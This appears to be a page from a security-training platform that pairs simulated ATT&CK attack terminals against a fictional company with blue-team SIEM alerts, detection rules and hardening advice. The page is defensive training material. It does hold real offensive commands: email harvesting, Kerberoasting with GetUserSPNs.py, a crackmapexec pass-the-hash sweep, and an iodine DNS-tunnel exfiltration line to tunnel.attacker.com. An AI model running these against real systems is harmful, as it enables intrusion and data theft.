foyl Red · Techniques
Technique Library
ATT&CK-aligned techniques — interactive terminals let you run simulated attacks and see exactly what fires on the blue side.
👁
Blue View: Off
Show SIEM alerts & defender context alongside each technique
TA0043
Reconnaissance
● Live
T1596.002
DNS / Passive Recon
▶ Try it
▼
Query public DNS records and certificate transparency logs to enumerate subdomains and infrastructure without touching the target. Completely passive — leaves zero logs on the target's systems.
attacker@kali:~/recon
Step 1 / 2
# Select target — choose what to enumerate
Target domain?
Blue Team View — T1596.002 Passive DNS
Detection Note
LOW SIGNAL
"note": "Passive recon leaves NO direct logs on your infrastructure", "detection_vector": "Certificate Transparency monitoring (external)", "recommend": "Subscribe to crt.sh alerts for your domains", "siem_rule": "N/A — blind spot by design"
Detection
Passive recon generates no logs on your infra
Monitor crt.sh CT logs for your domains via external tooling
Track new subdomain registrations with a monitoring service
Hardening
Audit public DNS — remove unused/dev subdomains
Don't expose staging via public DNS
Review CT logs regularly for unexpected certs
SIEM Notes
No direct detection possible for passive recon
Downstream: unusual access patterns may appear post-recon
T1589.002
Email Address Harvesting
▶ Try it
▼
Collect employee email addresses from LinkedIn, breach dumps, and search engine dorking. Email lists feed directly into phishing campaigns and password sprays. theHarvester aggregates multiple OSINT sources automatically.
attacker@kali:~/recon
Ready
# theHarvester — multi-source email enumeration
$ theHarvester -d ficsit-pioneer.corp -b all
Press RUN to simulate harvest
Blue Team View — T1589.002 Email Harvesting
Detection
Undetectable via standard SIEM — external passive activity
LinkedIn scraping is external to your network
Monitor HaveIBeenPwned / breach databases for your domain
Hardening
Use role-based email aliases (security@, noc@) not personal
Employee awareness: limit personal emails on LinkedIn
Check your domain in breach databases regularly
Downstream Risk
Email list → targeted phishing campaigns (T1566)
Email list → password spray userlist (T1110.003)
Discovered names → pretexting & vishing attacks
TA0001
Initial Access
● Live
T1566.002
AiTM Phishing (Spear-phishing Link)
▶ Try it
▼
Adversary-in-the-Middle phishing proxies the real login page so the victim completes MFA while the attacker captures the session cookie. The IRON CHIMNEY campaign used this against Ficsit Inc. via invoices-ficsit.io to compromise marcus.chen's account.
attacker@kali:~/aitm
Step 1 / 3
# Step 1: Select phishing target
Target employee at Ficsit Inc.:
Blue Team View — T1566.002 AiTM Phishing · IRON CHIMNEY
MailGuard Alert — THREAT-001
HIGH
{
"alert_id": "THREAT-001",
"rule": "Typosquat Domain — Phishing Link Delivered",
"severity": "HIGH",
"sender": "billing@invoices-ficsit.io",
"recipient": "marcus.chen@ficsit-pioneer.corp",
"subject": "Invoice #INV-2024-0847 — Action Required",
"phishing_url": "https://invoices-ficsit.io/login",
"technique": "AiTM proxy — session cookie capture",
"mitre": "T1566.002",
"campaign": "IRON CHIMNEY"
}
Email Detection
Typosquat domain — invoices-ficsit.io vs ficsit-pioneer.corp
No SPF/DKIM from attacker domain
Suspicious link in body — mismatched sender domain
Identity Signals
Sign-in from unexpected IP post-phishing
Session cookie reuse from Tor exit node
Successful MFA but unusual location → Identity risk alert
Hardening
Phishing-resistant MFA (FIDO2/hardware key)
Conditional Access: block Tor exit nodes
DMARC enforcement + link scanning in email gateway
TA0004
Privilege Escalation
● Live
T1110.003
Password Spraying
▶ Interactive
▼
Test one or a few common passwords across a large list of accounts, staying below lockout thresholds. Highly effective against orgs with weak password policies. The Ficsit Inc. priya.khatri account was compromised using this technique (Welcome1!).
attacker@kali:~/spray
Step 1 / 3
# Step 1 — Select your wordlist
Which password list will you use?
Blue Team View — T1110.003 Password Spray
SIEM Alert — ALT-2024-8847
HIGH
{
"alert_id": "ALT-2024-8847",
"rule": "Password Spray — Low-and-Slow LDAP",
"severity": "HIGH",
"source_ip": "192.168.2.50",
"target_domain": "ficsit-pioneer.corp",
"event_id": 4625,
"unique_accounts_targeted": 29,
"total_failures": 86,
"spray_window_mins": 30,
"compromised": ["priya.khatri"],
"mitre": "T1110.003",
"timestamp": "2024-03-15T14:22:41Z"
}
Event IDs
4625 — Failed logon (bulk from single source)
4624 — Successful logon (after valid hit)
Logon Type 3 (Network) from non-admin workstation
SIEM Rule
>10 unique accounts failing auth from same IP in 30min
Pattern: 1 attempt per account (avoids lockout)
Correlate: success event 4624 following spray window
Hardening
Enforce MFA on all accounts
Password policy: ban common passwords (AAD/Entra banned list)
Smart lockout & risk-based Conditional Access
Alert on spray pattern even below lockout threshold
T1558.003
Kerberoasting
▶ Try it
▼
Request Kerberos TGS tickets for service accounts (SPNs) and crack them offline. Service accounts often have long-lived, weak passwords set by humans years ago. RC4-encrypted tickets crack much faster than AES256 — look for etype 0x17 in Event 4769.
attacker@kali:~/kerb
Ready
# Request TGS tickets for all SPNs in the domain
$ GetUserSPNs.py ficsit-pioneer.corp/marcus.chen -request
Compromise required: marcus.chen credentials
Blue Team View — T1558.003 Kerberoasting
SIEM Alert — ALT-2024-4769
HIGH
{
"alert_id": "ALT-2024-4769",
"rule": "Kerberoasting — RC4 TGS Bulk Request",
"event_id": 4769,
"ticket_encryption": "0x17 (RC4-HMAC) — crackable offline",
"requester": "marcus.chen@ficsit-pioneer.corp",
"spns_requested": 7,
"time_window_secs": 8,
"severity": "HIGH"
}
Event IDs
4769 — Kerberos TGS requested (on DC)
Filter: EncryptionType = 0x17 (RC4) — crackable
Alert on: >5 TGS requests (RC4) from one host in 60s
SIEM Detection
Single user requesting TGS for multiple SPNs
Non-admin requesting service account tickets
Correlate with first-time service account access
Hardening
Use AES256 encryption on all service accounts
Managed Service Accounts (gMSA) — auto-rotating
Service account passwords >25 chars
Audit SPNs — remove unused service accounts
TA0008
Lateral Movement
● Live
T1550.002
Pass-the-Hash (PtH)
▶ Try it
▼
Authenticate to remote services using a captured NTLM hash — no plaintext password needed. Particularly effective when the same local admin hash is shared across many machines (pre-LAPS environments). Works against SMB, WMI, WinRM, RDP (NLA disabled).
attacker@kali:~/lateral
Ready
# CrackMapExec — PtH across subnet
$ crackmapexec smb 192.168.1.0/24 \
-u Administrator \
-H aad3b435b51404ee:a823f29b9f43d20a
Hash from: mimikatz / LSASS dump
Blue Team View — T1550.002 Pass-the-Hash
SIEM Alert — ALT-2024-5140 · IRON CHIMNEY
HIGH
{
"alert_id": "ALT-2024-5140",
"rule": "Lateral Movement — SMB Admin Share Access",
"event_id": 5140,
"account": "FICSIT\\Administrator",
"source_host": "RESEARCH-STATION-01",
"targets_accessed": ["FIC-DC-01", "FIC-EXCH-01", "FINANCE-WS-01"],
"share": "ADMIN$",
"logon_type": 3,
"mitre": "T1550.002",
"campaign": "INV-2024-0087 IRON CHIMNEY"
}
Event IDs
4624 — Network logon (Type 3) from workstation
5140 — Admin share accessed (C$, ADMIN$)
4648 — Explicit credential use
SIEM Rule
Same account: 3+ hosts in <5 min (lateral pattern)
Admin share access from non-admin workstation
Logon Type 3 + admin share = high-fidelity alert
Hardening
LAPS — unique local admin password per machine
Disable NTLM authentication where Kerberos available
Protected Users security group
Credential Guard — protects LSASS
TA0010
Exfiltration
● Live
T1048.003
Exfil Over Alternative Protocol (DNS)
▶ Try it
▼
Encode data in DNS queries/responses to exfiltrate through firewalls that allow outbound DNS. DNS is almost universally permitted outbound — even strict firewall rules rarely block it. The m.blake scenario in Ficsit also included Dropbox and Telegram exfil via CASB-visible channels.
attacker@kali:~/exfil
Ready
# DNS tunnel exfil — encode file in TXT record queries
$ iodined -f 10.0.0.1 tunnel.attacker.com
# On victim (m.blake workstation):
$ iodine -f tunnel.attacker.com
Simulate m.blake source code exfil
Blue Team View — T1048.003 DNS Tunneling · m.blake exfil
NGFW Alert — Anomalous DNS Volume
HIGH
{
"alert_id": "FW-2024-3391",
"rule": "DNS Tunneling — High Query Volume + Long Labels",
"source_host": "m.blake workstation (192.168.3.88)",
"dns_queries_per_min": 847,
"avg_query_length_chars": 118,
"external_domain": "*.tunnel.attacker.com",
"entropy": "HIGH (base64 encoded data)",
"mitre": "T1048.003"
}
DNS Signals
High-entropy subdomain labels (base64-encoded data)
Queries >100 chars — abnormal DNS label length
High query volume from single host to one domain
Cloud / CASB
m.blake — Dropbox upload from non-corp device
Telegram API outbound from workstation
CASB: unsanctioned cloud app data transfer >50MB
Hardening
DNS filtering with query analytics
Block non-business DNS resolvers
CASB: block unsanctioned cloud storage
DLP on large outbound transfers
Remaining Tactics — Coming Soon
TA0002 · Execution
TA0003 · Persistence
TA0005 · Defense Evasion
TA0006 · Credential Access
TA0007 · Discovery
TA0009 · Collection
TA0011 · Command & Control
TA0042 · Resource Development
TA0040 · Impact